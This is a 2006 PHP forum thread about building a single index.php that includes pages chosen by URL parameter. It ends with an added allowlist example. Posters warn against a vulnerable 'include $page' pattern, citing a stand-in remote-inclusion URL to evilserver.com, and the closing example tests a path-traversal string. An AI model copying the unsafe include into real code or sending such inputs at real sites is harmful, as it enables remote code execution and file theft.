Topic: Page IDs |
Author |
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
Posted: Sun 12 Nov '06 21:46 Post subject: Page IDs |
|
|
How would I do this in PHP?
Have one page that would contain other pages. Like this. Address in bar:
www.something.com/index.php?page=home
and have another page like this:
www.something.com/index.php?page=stuff
So basically I need to have one page that does a lot. I would want it to have a server-side-include that would change. Can somebody help me with that? |
|
|
James Blond Moderator
Joined: 19 Jan 2006 Posts: 7360 Location: Germany, Next to Hamburg
|
Posted: Sun 12 Nov '06 22:31 Post subject: |
|
|
You can do that like
Code: |
<?php
$page=$_GET['page'];
include $page;
?>
|
But you must be very careful with that! Some bad ppl could mess with that like
www.something.com/index.php?page=http://evilserver.com/badinput.php
So you have to check what is coming in. Or much better, create a white list!
Code: |
$allowed_sites = array( "help", "main", "contact" );
if ( in_array( $_GET['page'] ) )
{
include( './includes/' . $_GET['page'] . '.php' );
}
else
{
die "Hacking attempt";
}
|
This script also includes from the subfolder includes. So no one can hack it. |
|
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
Posted: Mon 13 Nov '06 0:39 Post subject: |
|
|
Thanks, that works great. But the safety code does not. I put that in and nothing comes up.
I tried something like www.something.com/index.php?page=http://evilserver.com/badinput.php, and nothing happened. It didn't work anyway.
I was wondering if index.php could read another page with all the links? Because then I would not need to give ?name=something.php. I could just give something. |
|
|
James Blond Moderator
Joined: 19 Jan 2006 Posts: 7360 Location: Germany, Next to Hamburg
|
Posted: Mon 13 Nov '06 12:15 Post subject: |
|
|
Whoops! I was in a hurry, sorry! Made some syntax errors
Code: |
<?php
$allowed_sites = array( "help", "main", "contact" );
if(in_array( $_GET['page'],$allowed_sites)){
include( './includes/' . $_GET['page'] . '.php' );
}
else
{
die("Hacking attempt");
}
?>
|
But error handling for when $_GET['page'] is empty is still missing! |
|
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
|
|
James Blond Moderator
Joined: 19 Jan 2006 Posts: 7360 Location: Germany, Next to Hamburg
|
Posted: Mon 13 Nov '06 15:16 Post subject: |
|
|
Why do you include the file 2 times?
include $page and include( './includes/' . $_GET['page'] . '.php' );
That makes no sense.
The include( './includes/' . $_GET['page'] . '.php' ); always includes a php file! You don't have to put the .php in the url! If you do, the include tries to
include e.g. include/hi.php.php
In the array $allowed_sites you don't have to set .php, only put "hi" into it.
For debugging, you should show all errors.
error_reporting(E_ALL); |
|
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
Posted: Mon 13 Nov '06 15:31 Post subject: |
|
|
That was stupid of me. It works fine now. Thank you! |
|
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
Posted: Mon 13 Nov '06 20:34 Post subject: |
|
|
I have folders (besides includes) and sub-folders and I need to have those pages too. How would I do that?
EDIT: actually can you make a script with a category and page.
It would control a folder and a file. |
|
|
Brian
Joined: 21 Oct 2005 Posts: 209 Location: Puyallup, WA USA
|
Posted: Mon 13 Nov '06 22:53 Post subject: |
|
|
Code: |
<?php
// map of page IDs to the directory and file that serve them
$pages = array(
    'index' => array(
        'dir' => '/dir1/dir2/',
        'file' => 'page.php',
    ),
    'index2' => array(
        'dir' => '/dir1/dir3/',
        'file' => 'page.php',
    ),
    'index3' => array(
        'dir' => '/dir1/dir2/',
        'file' => 'page2.php',
    ),
    'index4' => array(
        'dir' => '/dir1/dir4/',
        'file' => 'page.php',
    ),
);
// assuming GET here, and set to 'index' if not provided
// (or not a plain string); this is basic error correction
$page = ( isset( $_GET['page'] ) && is_string( $_GET['page'] ) ) ? strtolower( $_GET['page'] ) : 'index';
// if it's not a key of the array, let's go to the default which
// is 'index' (in_array() would search the values, not the page IDs)
if( !array_key_exists( $page, $pages ) )
    $page = 'index';
// now include the correct page from the appropriate dir
include( $pages[$page]['dir'] . $pages[$page]['file'] );
?>
|
As an example if you had:
http://www.someurl.com?page=index2
It would load the values from 'index2' which would be a path of:
/dir1/dir3/page.php
Does this make sense?
It gets complicated, but if you use arrays that are populated from a db, such as if you were using a Content Management System of some sort, then this could actually be highly flexible, making it so easy to change where pages load from, and all the while the client never knows because the URL does not change.
What's more, you can change pages based on such things as the HTTP_REFERER, the IP, the time of day, or whatever criteria you want. I use complex arrays for sites that have to change a lot, or have to change based on certain "conditions". |
|
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
|
|
Brian
Joined: 21 Oct 2005 Posts: 209 Location: Puyallup, WA USA
|
Posted: Tue 14 Nov '06 0:03 Post subject: |
|
|
It is the same principle, but instead you pass two vars and maybe you use multiple one dimensional arrays, I dunno.
At some risk here, I suggest that you should really buy a book on PHP if you are working with the extreme basic stuff. Seriously, that is what I did, but you can also get a ton of info using the online manuals at php.net as well.
The example I offered could be modified in twenty different ways, or more. It's just an example, but if you would prefer to pass a bunch of variables, you have to consider error detection, correction, and by extension, security.
What happens when they pass a bunch of bogus variables across, how does your web site's backend respond?
You can write your URLs in so many ways such as:
Code: |
?c=folder&page=file
?c=folder,file
?c=folder,file,0e25b6dd4ca582a5e63d8f706af011d0 // checksum
// or you could use a session to deliver the checksum,
// using client side javascript
// sky is the limit
?c[0]=folder&c[1]=file // results in an array
|
So you decide based on your needs. But your needs should be guided by security, in my estimation. Security is only as sound as your knowledge base is at the time you write your code. Start with the basics, get a book - that is my sincere and humble advice. |
|
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
Posted: Tue 14 Nov '06 15:12 Post subject: |
|
|
Well, I don't have a book now. And I need this script. I edited James' script. But it did not work. This is the script, but can you please help me?
Code: |
$c=$_GET['c'];
$page=$_GET['page'];
$allowed_sites = array( "hi", "main", "contact" );
if(in_array( $_GET['c'],$_GET['page'],$allowed_sites))
{
include( . /$_GET['c']/ . $_GET['page'] . '.php' );
}
else
{
die("Hacking attempt");
}
|
Nothing comes up when I open http://data-base-web.com/tester/index.php?c=includes&page=hi . |
|
|
James Blond Moderator
Joined: 19 Jan 2006 Posts: 7360 Location: Germany, Next to Hamburg
|
Posted: Tue 14 Nov '06 15:56 Post subject: |
|
|
Turn your error handling on! Or you won't see the errors!
in your php.ini
Code: |
error_reporting = E_ALL & ~E_NOTICE
display_errors = On
|
|
|
|
Brian
Joined: 21 Oct 2005 Posts: 209 Location: Puyallup, WA USA
|
Posted: Tue 14 Nov '06 16:00 Post subject: |
|
|
Yes, and along with turning on error reporting, as you should for development anyway, you should also ensure you are writing to a PHP.LOG file, or PHP_ERROR.LOG, whatever you call it. You should see errors reported to some log file that you designate in your PHP.INI file. Always look at the logs for helpful troubleshooting info. |
|
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
|
|
Brian
Joined: 21 Oct 2005 Posts: 209 Location: Puyallup, WA USA
|
Posted: Tue 14 Nov '06 19:44 Post subject: |
|
|
Paste the portion of your PHP.INI file that covers Error Reporting would you. It appears you do not have error reporting set properly by my estimation. Further, what do you have for error log set up in your PHP.INI?
You really need both the error log and the error reporting. |
|
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
Posted: Tue 14 Nov '06 19:50 Post subject: |
|
|
Code: | ; - register_long_arrays = Off [Performance]
; Disables registration of the older (and deprecated) long predefined array
; variables ($HTTP_*_VARS). Instead, use the superglobals that were
; introduced in PHP 4.1.0
- display_errors = On [Security]
; With this directive set to off, errors that occur during the execution of
; scripts will no longer be displayed as a part of the script output, and thus,
; will no longer be exposed to remote users. With some errors, the error message
; content may expose information about your script, web server, or database
; server that may be exploitable for hacking. Production sites should have this
; directive set to off.
; - log_errors = On [Security]
; This directive complements the above one. Any errors that occur during the
; execution of your script will be logged (typically, to your server's error log,
; but can be configured in several ways). Along with setting display_errors to off,
; this setup gives you the ability to fully understand what may have gone wrong,
; without exposing any sensitive information to remote users.
; - output_buffering = 4096 [Performance]
; Set a 4KB output buffer. Enabling output buffering typically results in less
; writes, and sometimes less packets sent on the wire, which can often lead to
; better performance. The gain this directive actually yields greatly depends
; on which Web server you're working with, and what kind of scripts you're using.
; - register_argc_argv = Off [Performance]
; Disables registration of the somewhat redundant $argv and $argc global
; variables.
; - magic_quotes_gpc = Off [Performance]
; Input data is no longer escaped with slashes so that it can be sent into
; SQL databases without further manipulation. Instead, you should use the
; function addslashes() on each input element you wish to send to a database.
; - variables_order = "GPCS" [Performance]
; The environment variables are not hashed into the $_ENV. To access
; environment variables, you can use getenv() instead.
; - error_reporting = E_ALL [Code Cleanliness, Security(?)]
; By default, PHP suppresses errors of type E_NOTICE. These error messages
; are emitted for non-critical errors, but that could be a symptom of a bigger
; problem. Most notably, this will cause error messages about the use
; of uninitialized variables to be displayed.
; - allow_call_time_pass_reference = Off [Code cleanliness]
; It's not possible to decide to force a variable to be passed by reference
; when calling a function. The PHP 4 style to do this is by making the
; function require the relevant argument by reference.
|
I also have error_reporting = E_ALL & ~E_NOTICE |
|
|
Brian
Joined: 21 Oct 2005 Posts: 209 Location: Puyallup, WA USA
|
Posted: Tue 14 Nov '06 20:12 Post subject: |
|
|
Okay, everything you posted above is comment text and none of it has any bearing on the functionality or performance of your server.
On my local testing server, running FCGI, here are my settings for logging and reporting errors:
Code: |
error_reporting = E_PARSE | E_ERROR | E_WARNING | E_NOTICE
display_errors = On
display_startup_errors = On
log_errors = On
log_errors_max_len = 1024
ignore_repeated_errors = Off
ignore_repeated_source = Off
report_memleaks = On
track_errors = Off
error_log = c:/apache2/logs/PHP_FCGI_error.log
|
I chose to report most things, even notices, I like my production code to be ultra clean, though it's not really necessary I suppose.
Tell me if you have something like these settings. Notice that I created a log file with error_log = c:/apache2/logs/PHP_FCGI_error.log. I hope this helps you out a bit to get the error reporting and logging enabled and functional.
Even if you have something not shown to the screen, which in a production environment you would not want in most cases, you should be logging these errors.
Notice: None of the lines of my INI pasted above are commented out, that is, starting with a ; semicolon character. These are the basics of configuring and running a PHP based web server that a book will help you with, to get the basics down first, building a knowledge foundation.
Last edited by Brian on Tue 14 Nov '06 20:13; edited 1 time in total |
|
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
Posted: Tue 14 Nov '06 20:13 Post subject: |
|
|
look at the 7th line |
|
|
Brian
Joined: 21 Oct 2005 Posts: 209 Location: Puyallup, WA USA
|
Posted: Tue 14 Nov '06 20:24 Post subject: |
|
|
Something else that crosses my mind, why do you not have error detection and correction in place?
For example, if you say page=index but let's say someone gets cute and tries to type page=indexx or something else, what happens?
I suggest you force them back to the default page, perhaps defaulting back to page=index. Error detection can also allow you an opportunity to create through your PHP scripts custom logging, something my sites do when needed. They open and update a log file (flat text file), or make a db entry. This can be useful in some cases. Again, all basic stuff. |
|
|
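The category-plus-page include requested earlier in the thread, combined with the fallback to a default page and the logging of rejected requests suggested in the last post. This is an added example, not code from any poster; the category names, the resolve_page() helper and its parameters are assumptions made for illustration.

```php
<?php
// Added example: category + page include driven by an allowlist.
// Category and page names are constructed for illustration.
$allowed = [
    'includes' => ['hi', 'main', 'contact'],
    'docs'     => ['faq', 'install'],
];

/**
 * Turn request parameters into a file path. Anything that is not an exact
 * match for an allowlisted (category, page) pair falls back to $default.
 */
function resolve_page(array $get, array $allowed, string $baseDir,
                      array $default = ['includes', 'main']): string
{
    $c    = $get['c'] ?? null;
    $page = $get['page'] ?? null;

    // Missing, empty and non-string values all fail here; ?c[]=x reaches
    // PHP as an array, so the is_string() checks are not optional.
    $ok = is_string($c) && is_string($page)
        && array_key_exists($c, $allowed)
        && in_array($page, $allowed[$c], true); // strict: no type juggling

    if (!$ok) {
        if ($c !== null || $page !== null) {
            // json_encode() escapes newlines, so input cannot forge log lines.
            error_log('rejected page request: '
                . json_encode([$c, $page], JSON_INVALID_UTF8_SUBSTITUTE));
        }
        [$c, $page] = $default;
    }
    // Both parts are now allowlist entries or the fixed default.
    return $baseDir . '/' . $c . '/' . $page . '.php';
}

// Constructed requests, shaped the way PHP fills $_GET.
$samples = [
    ['c' => 'includes', 'page' => 'hi'],                 // valid
    ['c' => 'docs', 'page' => 'hi'],                     // page of another category
    ['c' => 'includes', 'page' => '../../etc/passwd'],   // traversal string
    ['page' => 'http://evilserver.com/badinput.php'],    // URL from the thread
    ['c' => ['includes'], 'page' => 'hi'],               // array instead of string
    [],                                                  // no parameters at all
];
foreach ($samples as $get) {
    echo resolve_page($get, $allowed, __DIR__), "\n";
}
// In index.php: include resolve_page($_GET, $allowed, __DIR__);
```

Only the first sample resolves to the page it asked for; every other request resolves to the default page, and each one that supplied a parameter is written to the error log.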